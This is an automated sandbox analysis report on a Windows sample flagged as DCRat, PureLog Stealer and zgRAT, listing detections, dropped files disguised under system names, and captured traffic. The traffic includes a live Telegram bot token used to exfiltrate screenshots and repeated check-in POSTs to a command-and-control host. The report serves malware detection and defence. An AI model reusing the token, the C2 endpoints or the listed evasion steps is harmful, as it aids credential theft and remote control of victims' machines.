Windows Analysis Report
Vqzx4PFehn.exe

Overview

General Information

Sample name: Vqzx4PFehn.exe
(renamed because the original name is a hash value)
Original sample name: 1925339cab9e6a65f43c5f04321156e2.exe
Analysis ID: 1433033
MD5: 1925339cab9e6a65f43c5f04321156e2
SHA1: 16fc99e39d5dd91b915da5ffb969f56597d54c06
SHA256: fb2e3a0d29ae08e964de8bcc1cf986b3a6b928d13e14368cc31535236afd024e
Tags: DCRatexe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
Adds a directory exclusion to Windows Defender
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: C:\Users\user\Desktop\uCFUtfTN.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\fJkHwTWu.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Defender\services.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\nntxgNlb.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\EqkKdrOv.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\28moAYly7n.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Windows\Registration\csrss.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Windows Defender\services.exe ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\services.exe Virustotal: Detection: 65%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Virustotal: Detection: 65%
Source: C:\Recovery\XXPWErhsUbDrk.exe ReversingLabs: Detection: 83%
Source: C:\Recovery\XXPWErhsUbDrk.exe Virustotal: Detection: 65%
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe ReversingLabs: Detection: 83%
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Virustotal: Detection: 65%
Source: C:\Users\user\Desktop\DtICHrzA.log Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\EqkKdrOv.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\EqkKdrOv.log Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\SHKzphsQ.log Virustotal: Detection: 9%
Source: C:\Users\user\Desktop\TQvqMYlM.log Virustotal: Detection: 9%
Source: C:\Users\user\Desktop\fJkHwTWu.log Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\mqRpKNWg.log Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\nntxgNlb.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\nntxgNlb.log Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\uCFUtfTN.log Virustotal: Detection: 19%
Source: C:\Windows\Registration\csrss.exe ReversingLabs: Detection: 83%
Source: C:\Windows\Registration\csrss.exe Virustotal: Detection: 65%
Source: C:\portintosvc\driverInto.exe ReversingLabs: Detection: 83%
Source: C:\portintosvc\driverInto.exe Virustotal: Detection: 65%
Source: Vqzx4PFehn.exe ReversingLabs: Detection: 60%
Source: Vqzx4PFehn.exe Virustotal: Detection: 70%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\services.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TQvqMYlM.log Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SHKzphsQ.log Joe Sandbox ML: detected
Source: C:\Windows\Registration\csrss.exe Joe Sandbox ML: detected
Source: Vqzx4PFehn.exe Joe Sandbox ML: detected
Source: Vqzx4PFehn.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: Vqzx4PFehn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vqzx4PFehn.exe
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0100A69B
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0101C220
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\portintosvc\driverInto.exe File opened: C:\Users\user\AppData\Local

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49739 -> 172.67.144.153:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1 | Content-Type: multipart/form-data; boundary="f4f047d2-73f9-4a98-88b4-47c11c582381" | Host: api.telegram.org | Content-Length: 98854 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 | Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1 | Content-Type: multipart/form-data; boundary="e318265f-a5ec-49e0-abbc-3a95e0368c35" | Host: api.telegram.org | Content-Length: 98799 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: 83 POST requests to intopart.top, all with the same request line and headers (only Content-Length and the presence of the Connection header vary):
POST /Eternalpollgeocpu.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: intopart.top
Content-Length: (varies, listed below)
Expect: 100-continue
Connection: Keep-Alive (only on the requests marked KA below)
Content-Length values in order of observation: 344 (KA), 384, 1788, 1080 (KA), 1080, 1080 (KA), 1788 (KA), 1080 (KA), 1080, 1076 (KA), 1080 (KA), 1080, 1080 (KA), 1080 (KA), 1080 (KA), 1788 (KA), 1080, 1080, 1080 (KA), 1080 (KA), 1080 (KA), 1772 (KA), 1080, 1080, 249068 (KA), 1072 (KA), 1080, 1080, 1788, 1080, 1076, 1080, 1080, 1080, 1772, 1080, 1080, 1080, 1788, 1080, 1080, 1080, 1080, 1080, 1760, 1080, 1080, 1080, 1080, 1080, 1080, 1788, 1080, 1076, 1080, 1080, 1788, 1080, 1080, 1080, 1080, 1080, 1080, 1080, 1788, 1080, 1080, 1080, 1080, 1080, 1080, 1080, 1080, 1788, 1080, 1080, 1080, 1080, 1080, 1076, 1080, 1080, 1788
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1760Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1076Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1788Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /Eternalpollgeocpu.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: intopart.topContent-Length: 1080Expect: 100-continue
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: intopart.top
Source: unknown HTTP traffic detected: POST /bot7126538506:AAGUzEDEgn6X6JiRyzOOTz-UryNJDm6IzOs/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="f4f047d2-73f9-4a98-88b4-47c11c582381" Host: api.telegram.org Content-Length: 98854 Expect: 100-continue Connection: Keep-Alive
Source: driverInto.exe, 00000004.00000002.1887420284.000000000374D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
